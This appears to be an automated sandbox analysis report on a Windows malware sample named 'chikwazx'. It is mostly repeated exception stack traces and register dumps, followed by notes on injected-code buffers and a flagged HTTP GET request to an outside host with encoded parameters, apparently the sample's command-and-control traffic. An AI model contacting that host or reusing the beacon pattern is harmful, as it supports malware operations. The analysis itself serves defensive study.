__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7768199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7768193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633008 registers.edi: 1633096 registers.eax: 23117 registers.ebp: 1633068 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7769af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632860 registers.edi: 1632956 registers.eax: 23117 registers.ebp: 1632920 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003311104	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7769ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7769af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632992 registers.edi: 1633080 registers.eax: 23117 registers.ebp: 1633052 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633116 registers.edi: 1633212 registers.eax: 23117 registers.ebp: 1633176 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003414528	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7768199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7768193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633008 registers.edi: 1633096 registers.eax: 23117 registers.ebp: 1633068 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7769af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632860 registers.edi: 1632956 registers.eax: 23117 registers.ebp: 1632920 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003311104	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7769ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7769af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632992 registers.edi: 1633080 registers.eax: 23117 registers.ebp: 1633052 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633116 registers.edi: 1633212 registers.eax: 23117 registers.ebp: 1633176 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003414528	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7768199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7768193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633008 registers.edi: 1633096 registers.eax: 23117 registers.ebp: 1633068 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7769af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632860 registers.edi: 1632956 registers.eax: 23117 registers.ebp: 1632920 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003311104	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7769ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7769af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632992 registers.edi: 1633080 registers.eax: 23117 registers.ebp: 1633052 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633116 registers.edi: 1633212 registers.eax: 23117 registers.ebp: 1633176 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003414528	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7768199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7768193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633008 registers.edi: 1633096 registers.eax: 23117 registers.ebp: 1633068 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7769af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632860 registers.edi: 1632956 registers.eax: 23117 registers.ebp: 1632920 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003311104	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (12 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.youandiconsulting.com/mvc8/?nvDHJR=gtxde&OB=EpC5wqvZS9F1/Tmlm5iLNBR8Q8YHzUAaJWzlNDHYOMZZB9lIYTkXOBtDpP8CfT99QMYyBIPx
